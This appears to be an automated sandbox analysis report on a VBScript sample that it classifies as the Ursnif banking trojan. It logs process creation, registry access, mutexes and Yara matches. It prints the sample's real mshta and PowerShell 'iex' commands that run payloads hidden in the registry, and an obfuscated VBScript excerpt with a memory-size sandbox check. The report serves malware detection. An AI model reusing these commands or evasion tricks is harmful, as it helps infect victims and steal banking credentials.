            Source: C:\Windows\System32\rundll32.exeCode function: 39_2_0000027FF7501002 NtProtectVirtualMemory,NtProtectVirtualMemory,39_2_0000027FF7501002
            Source: C:\Windows\System32\control.exeCode function: 25_2_00B9C16425_2_00B9C164
            Source: C:\Windows\System32\control.exeCode function: 25_2_00B9A4BC25_2_00B9A4BC
            Source: C:\Windows\System32\control.exeCode function: 25_2_00B9676C25_2_00B9676C
            Source: C:\Windows\System32\control.exeCode function: 25_2_00B9E08025_2_00B9E080
            Source: C:\Windows\System32\control.exeCode function: 25_2_00B920F825_2_00B920F8
            Source: C:\Windows\System32\control.exeCode function: 25_2_00B7203C25_2_00B7203C
            Source: C:\Windows\System32\control.exeCode function: 25_2_00B9003425_2_00B90034
            Source: C:\Windows\System32\control.exeCode function: 25_2_00B9606425_2_00B96064
            Source: C:\Windows\System32\control.exeCode function: 25_2_00B8B04025_2_00B8B040
            Source: C:\Windows\System32\control.exeCode function: 25_2_00B991A025_2_00B991A0
            Source: C:\Windows\System32\control.exeCode function: 25_2_00B8913825_2_00B89138
            Source: C:\Windows\System32\control.exeCode function: 25_2_00B7C13425_2_00B7C134
            Source: C:\Windows\System32\control.exeCode function: 25_2_00B8117425_2_00B81174
            Source: C:\Windows\System32\control.exeCode function: 25_2_00B9F94025_2_00B9F940
            Source: C:\Windows\System32\control.exeCode function: 25_2_00B9822425_2_00B98224
            Source: C:\Windows\System32\control.exeCode function: 25_2_00B9320825_2_00B93208
            Source: C:\Windows\System32\control.exeCode function: 25_2_00B8938025_2_00B89380
            Source: C:\Windows\System32\control.exeCode function: 25_2_00B72BC825_2_00B72BC8
            Source: C:\Windows\System32\control.exeCode function: 25_2_00B7732025_2_00B77320
            Source: C:\Windows\System32\control.exeCode function: 25_2_00B78B5C25_2_00B78B5C
            Source: C:\Windows\System32\control.exeCode function: 25_2_00B994B825_2_00B994B8
            Source: C:\Windows\System32\control.exeCode function: 25_2_00B89CB025_2_00B89CB0
            Source: C:\Windows\System32\control.exeCode function: 25_2_00B8D4A825_2_00B8D4A8
            Source: C:\Windows\System32\control.exeCode function: 25_2_00B7BCF825_2_00B7BCF8
            Source: C:\Windows\System32\control.exeCode function: 25_2_00B83CE025_2_00B83CE0
            Source: C:\Windows\System32\control.exeCode function: 25_2_00B974CC25_2_00B974CC
            Source: C:\Windows\System32\control.exeCode function: 25_2_00B80CC025_2_00B80CC0
            Source: C:\Windows\System32\control.exeCode function: 25_2_00B7D46025_2_00B7D460
            Source: C:\Windows\System32\control.exeCode function: 25_2_00B81D9425_2_00B81D94
            Source: C:\Windows\System32\control.exeCode function: 25_2_00B8452C25_2_00B8452C
            Source: C:\Windows\System32\control.exeCode function: 25_2_00B8B52025_2_00B8B520
            Source: C:\Windows\System32\control.exeCode function: 25_2_00B9B51625_2_00B9B516
            Source: C:\Windows\System32\control.exeCode function: 25_2_00B76D0825_2_00B76D08
            Source: C:\Windows\System32\control.exeCode function: 25_2_00B9BEB025_2_00B9BEB0
            Source: C:\Windows\System32\control.exeCode function: 25_2_00B926B425_2_00B926B4
            Source: C:\Windows\System32\control.exeCode function: 25_2_00B7AE0425_2_00B7AE04
            Source: C:\Windows\System32\control.exeCode function: 25_2_00B817B825_2_00B817B8
            Source: C:\Windows\System32\control.exeCode function: 25_2_00B9AFB825_2_00B9AFB8
            Source: C:\Windows\System32\control.exeCode function: 25_2_00B737B825_2_00B737B8
            Source: C:\Windows\System32\control.exeCode function: 25_2_00B79F9825_2_00B79F98
            Source: C:\Windows\System32\control.exeCode function: 25_2_00B8F77025_2_00B8F770
            Source: C:\Windows\System32\control.exeCode function: 25_2_00B7B75C25_2_00B7B75C
            Source: C:\Windows\System32\rundll32.exeCode function: 39_2_0000027FF74EC16439_2_0000027FF74EC164
            Source: C:\Windows\System32\rundll32.exeCode function: 39_2_0000027FF74EA4BC39_2_0000027FF74EA4BC
            Source: C:\Windows\System32\rundll32.exeCode function: 39_2_0000027FF74E320839_2_0000027FF74E3208
            Source: C:\Windows\System32\rundll32.exeCode function: 39_2_0000027FF74E91A039_2_0000027FF74E91A0
            Source: C:\Windows\System32\rundll32.exeCode function: 39_2_0000027FF74E822439_2_0000027FF74E8224
            Source: C:\Windows\System32\rundll32.exeCode function: 39_2_0000027FF74E20F839_2_0000027FF74E20F8
            Source: C:\Windows\System32\rundll32.exeCode function: 39_2_0000027FF74D117439_2_0000027FF74D1174
            Source: C:\Windows\System32\rundll32.exeCode function: 39_2_0000027FF74D913839_2_0000027FF74D9138
            Source: C:\Windows\System32\rundll32.exeCode function: 39_2_0000027FF74CC13439_2_0000027FF74CC134
            Source: C:\Windows\System32\rundll32.exeCode function: 39_2_0000027FF74EF94039_2_0000027FF74EF940
            Source: C:\Windows\System32\rundll32.exeCode function: 39_2_0000027FF74D17B839_2_0000027FF74D17B8
            Source: C:\Windows\System32\rundll32.exeCode function: 39_2_0000027FF74C37B839_2_0000027FF74C37B8
            Source: C:\Windows\System32\rundll32.exeCode function: 39_2_0000027FF74EAFB839_2_0000027FF74EAFB8
            Source: C:\Windows\System32\rundll32.exeCode function: 39_2_0000027FF74E606439_2_0000027FF74E6064
            Source: C:\Windows\System32\rundll32.exeCode function: 39_2_0000027FF74EE08039_2_0000027FF74EE080
            Source: C:\Windows\System32\rundll32.exeCode function: 39_2_0000027FF74C203C39_2_0000027FF74C203C
            Source: C:\Windows\System32\rundll32.exeCode function: 39_2_0000027FF74E003439_2_0000027FF74E0034
            Source: C:\Windows\System32\rundll32.exeCode function: 39_2_0000027FF74DB04039_2_0000027FF74DB040
            Source: C:\Windows\System32\rundll32.exeCode function: 39_2_0000027FF74E26B439_2_0000027FF74E26B4
            Source: C:\Windows\System32\rundll32.exeCode function: 39_2_0000027FF74EBEB039_2_0000027FF74EBEB0
            Source: C:\Windows\System32\rundll32.exeCode function: 39_2_0000027FF74E676C39_2_0000027FF74E676C
            Source: C:\Windows\System32\rundll32.exeCode function: 39_2_0000027FF74DF77039_2_0000027FF74DF770
            Source: C:\Windows\System32\rundll32.exeCode function: 39_2_0000027FF74C9F9839_2_0000027FF74C9F98
            Source: C:\Windows\System32\rundll32.exeCode function: 39_2_0000027FF74CB75C39_2_0000027FF74CB75C
            Source: C:\Windows\System32\rundll32.exeCode function: 39_2_0000027FF74CAE0439_2_0000027FF74CAE04
            Source: C:\Windows\System32\rundll32.exeCode function: 39_2_0000027FF74D3CE039_2_0000027FF74D3CE0
            Source: C:\Windows\System32\rundll32.exeCode function: 39_2_0000027FF74CBCF839_2_0000027FF74CBCF8
            Source: C:\Windows\System32\rundll32.exeCode function: 39_2_0000027FF74C6D0839_2_0000027FF74C6D08
            Source: C:\Windows\System32\rundll32.exeCode function: 39_2_0000027FF74EB51639_2_0000027FF74EB516
            Source: C:\Windows\System32\rundll32.exeCode function: 39_2_0000027FF74DD4A839_2_0000027FF74DD4A8
            Source: C:\Windows\System32\rundll32.exeCode function: 39_2_0000027FF74E94B839_2_0000027FF74E94B8
            Source: C:\Windows\System32\rundll32.exeCode function: 39_2_0000027FF74D9CB039_2_0000027FF74D9CB0
            Source: C:\Windows\System32\rundll32.exeCode function: 39_2_0000027FF74E74CC39_2_0000027FF74E74CC
            Source: C:\Windows\System32\rundll32.exeCode function: 39_2_0000027FF74D0CC039_2_0000027FF74D0CC0
            Source: C:\Windows\System32\rundll32.exeCode function: 39_2_0000027FF74D1D9439_2_0000027FF74D1D94
            Source: C:\Windows\System32\rundll32.exeCode function: 39_2_0000027FF74D452C39_2_0000027FF74D452C
            Source: C:\Windows\System32\rundll32.exeCode function: 39_2_0000027FF74DB52039_2_0000027FF74DB520
            Source: C:\Windows\System32\rundll32.exeCode function: 39_2_0000027FF74C2BC839_2_0000027FF74C2BC8
            Source: C:\Windows\System32\rundll32.exeCode function: 39_2_0000027FF74CD46039_2_0000027FF74CD460
            Source: C:\Windows\System32\rundll32.exeCode function: 39_2_0000027FF74D938039_2_0000027FF74D9380
            Source: C:\Windows\System32\rundll32.exeCode function: 39_2_0000027FF74C732039_2_0000027FF74C7320
            Source: C:\Windows\System32\rundll32.exeCode function: 39_2_0000027FF74D8B4C39_2_0000027FF74D8B4C
            Source: C:\Windows\System32\rundll32.exeCode function: 39_2_0000027FF74C8B5C39_2_0000027FF74C8B5C
            Source: 2Q4tLHa5wbO1.vbsInitial sample: Strings found which are bigger than 50
            Source: 5b2bnkld.dll.21.drStatic PE information: No import functions for PE file found
            Source: ztp4fhzn.dll.24.drStatic PE information: No import functions for PE file found
            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
            Source: classification engineClassification label: mal100.bank.troj.spyw.evad.winVBS@31/42@10/2
            Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{B24C39E1-2D7D-11EB-90EB-ECF4BBEA1588}.datJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\{523EEBAD-89C9-54C5-A3A6-CDC8873A517C}
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6692:120:WilError_01
            Source: C:\Windows\System32\control.exeMutant created: \Sessions\1\BaseNamedObjects\{DE7DF658-A5CB-C008-1FF2-A9F4C346ED68}
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3980:120:WilError_01
            Source: C:\Windows\System32\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\{42CF918A-B9C5-C4B3-5396-FD38372A81EC}
            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\adobe.urlJump to behavior
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\2Q4tLHa5wbO1.vbs'
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Windows\System32\wscript.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: C:\Windows\System32\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Windows\System32\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: unknownProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\2Q4tLHa5wbO1.vbs'
            Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7092 CREDAT:17410 /prefetch:2
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7092 CREDAT:17418 /prefetch:2
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7092 CREDAT:17424 /prefetch:2
            Source: unknownProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
            Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
            Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\5b2bnkld\5b2bnkld.cmdline'
            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES269.tmp' 'c:\Users\user\AppData\Local\Temp\5b2bnkld\CSC18B8FCEB9D646308CD119582578A238.TMP'
            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ztp4fhzn\ztp4fhzn.cmdline'
            Source: unknownProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES16AC.tmp' 'c:\Users\user\AppData\Local\Temp\ztp4fhzn\CSC901590E0DE33494E82C695FA40AE49BE.TMP'
            Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\404E.bi1'
            Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
            Source: unknownProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7092 CREDAT:17410 /prefetch:2Jump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7092 CREDAT:17418 /prefetch:2Jump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7092 CREDAT:17424 /prefetch:2Jump to behavior
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\5b2bnkld\5b2bnkld.cmdline'Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ztp4fhzn\ztp4fhzn.cmdline'Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES269.tmp' 'c:\Users\user\AppData\Local\Temp\5b2bnkld\CSC18B8FCEB9D646308CD119582578A238.TMP'Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES16AC.tmp' 'c:\Users\user\AppData\Local\Temp\ztp4fhzn\CSC901590E0DE33494E82C695FA40AE49BE.TMP'
            Source: C:\Windows\System32\control.exeProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\404E.bi1'
            Source: C:\Windows\explorer.exeProcess created: unknown unknown
            Source: C:\Windows\explorer.exeProcess created: unknown unknown
            Source: C:\Windows\explorer.exeProcess created: unknown unknown
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Windows\SYSTEM32\msftedit.dll
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Windows\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dllJump to behavior
            Source: Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 00000015.00000002.780870851.000001EEE0E80000.00000002.00000001.sdmp, csc.exe, 00000018.00000002.791405788.0000024AD3D50000.00000002.00000001.sdmp
            Source: Binary string: wscui.pdbUGP source: explorer.exe, 0000001E.00000000.820880148.0000000005A00000.00000002.00000001.sdmp
            Source: Binary string: rundll32.pdb source: control.exe, 00000019.00000002.848753339.0000022984BCC000.00000004.00000040.sdmp
            Source: Binary string: rundll32.pdbGCTL source: control.exe, 00000019.00000002.848753339.0000022984BCC000.00000004.00000040.sdmp
            Source: Binary string: wscui.pdb source: explorer.exe, 0000001E.00000000.820880148.0000000005A00000.00000002.00000001.sdmp

            Data Obfuscation:

            barindex
            VBScript performs obfuscated calls to suspicious functionsShow sources
            Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.ScriptName, cStr(293199629)) > 0 And Ian961 = 0) Then' hazelnut eyebright nereid Carthage refugee adrenalin Pillsbury, cesium Verdi jujube impassion Chesapeake Martha newsmen, covariant jitter cosmos, bounce Dickerson Huffman roe decent critter mucus veneer, Algonquin Waterloo Pygmalion cupidity Faust Tyson, metallurgy sabotage beady dodge quadratic recess. laminar Hesse mimicking plan Vanderbilt mutton MacGregor Europa mycoplasma need seven axiomatic Manley plaguey boxy block clearheaded nightmare stingy assail Brandon Shepard theyll cachalot coercible indigestion imperious advisor lioness clockwise whelm valuate cue arbutus accordant wiseacre massage narwhal210. junta. billfold giveaway ROTC sake. antiphonal infinity ashame IBM diamagnetism erosive allegate birch cougar. cinematic Dahl leitmotif Exit FunctionEnd If' intrusive Breton Basque. 2165312 daunt Acapulco Annie Fargo permitted. conundrum mere waterhole eradicable lorry Rafael morass tinkle conservator Judd Steiner lusty Mendelssohn menstruate orthonormal. 3014178 orthodoxy. 5019054 informative irresolvable Philippine Mafioso, Augustus. slaughter381 bulb Berkowitz Leeuwenhoek Christmas stint, Saginaw switchback Set taxidermy = GetObject("winmgmts:\\.\root\cimv2")Set Annie354 = taxidermy.ExecQuery("Select * from Win32_ComputerSystem")For Each selenate In Annie354Vaduz = Vaduz + Int((selenate.TotalPhysicalMemory) / (((104 - (146 - 143.0)) - 94.0) + 1048569.0))NextIf Vaduz < (1446 - ((49 - 3.0) + (4631 - 4261.0))) ThenNtGJYPtIEnd IfREM governor, 3468779 Anglophobia congresswomen duckweed Preston wolfish tremendous motor Glidden Herculean dusk sari ellipsoid bacterial Vladivostok283 ventral Dreyfuss farther755 statuette ding coexist Hungarian, Rudy you symmetry youve cobblestone fascicle tire phlox Klux illustrate dispense ouzo Frey204 criterion barrier conscience curio constipate Bradley beware tariff, 6831937 scorpion. kaleidoscope surefire, 7605153 Oregon Melinda Plexiglas pot concurring End FunctionFunction Perkins637()on error resume nextDim detritus115: Set detritus115 = CreateObject("Scripting.FileSystemObject")Dim rnVGZw: Set rnVGZw = detritus115.OpenTextFile(WScript.ScriptFullName)' aristocrat electrician Fraser dispersive howsomever inhibit58 Berman. 3125459 amplitude604 minutemen Anderson985 Cadillac camelopard calculable. saga travelogue nomogram Vivian creedal. sluggish meritorious giraffe scathing139. concept Duncan Ruben tribal exclusion florist. cathedral diplomat flexible717 sludge neater Bernadine bluster suggestible focus mandrill Nashua anatomic vodka boxy963 Leona screenful Neal campfire bush foot crockery QED. convolute Fenton landlocked marathon Riordan. 9150746 Confucian mull consultant. stickle femur bailiff Kansas Mollie storekeep embeddable. proficient euphe293199629 abalone addressee strict rug Layton bloodstain Moll combustion, 2306119 assemble Prokofieff doberman = rnVGZw.ReadallrnVGZw.close'MsgBox(((1518 - (87 + (742 - 63.0))) - 29.0))REM India
            Suspicious powershell command line foundShow sources
            Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))Jump to behavior
            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\5b2bnkld\5b2bnkld.cmdline'
            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ztp4fhzn\ztp4fhzn.cmdline'
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\5b2bnkld\5b2bnkld.cmdline'Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ztp4fhzn\ztp4fhzn.cmdline'Jump to behavior
            Source: C:\Windows\System32\control.exeCode function: 25_2_00B74DCD push 3B000001h; retf 25_2_00B74DD2
            Source: C:\Windows\System32\rundll32.exeCode function: 39_2_0000027FF74C4DCD push 3B000001h; retf 39_2_0000027FF74C4DD2

            Persistence and Installation Behavior:

            barindex
            Creates processes via WMIShow sources
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\5b2bnkld\5b2bnkld.dllJump to dropped file
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\ztp4fhzn\ztp4fhzn.dllJump to dropped file
            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\marginal.roqJump to dropped file
            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\marginal.roqJump to dropped file

            Hooking and other Techniques for Hiding and Protection:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 0000001E.00000003.808606221.0000000002B40000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.713745606.0000000004E38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000027.00000002.847373383.0000027FF74FE000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001F.00000002.919536378.0000027D4F83E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000000.822942973.000000000688E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000025.00000002.920076099.0000023FE357E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.784762432.0000000005000000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.713671055.0000000004E38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.726412237.0000000004CBB000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.713608519.0000000004E38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000019.00000002.846903592.0000000000BAE000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.813116966.00000000051F0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000019.00000003.795282435.0000022982C20000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000003.799740968.000001EFF5FD0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000027.00000003.846098745.0000027FF7200000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.713720104.0000000004E38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.713577898.0000000004E38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.713547031.0000000004E38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.713695029.0000000004E38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.713644884.0000000004E38000.00000004.00000040.sdmp, type: MEMORY
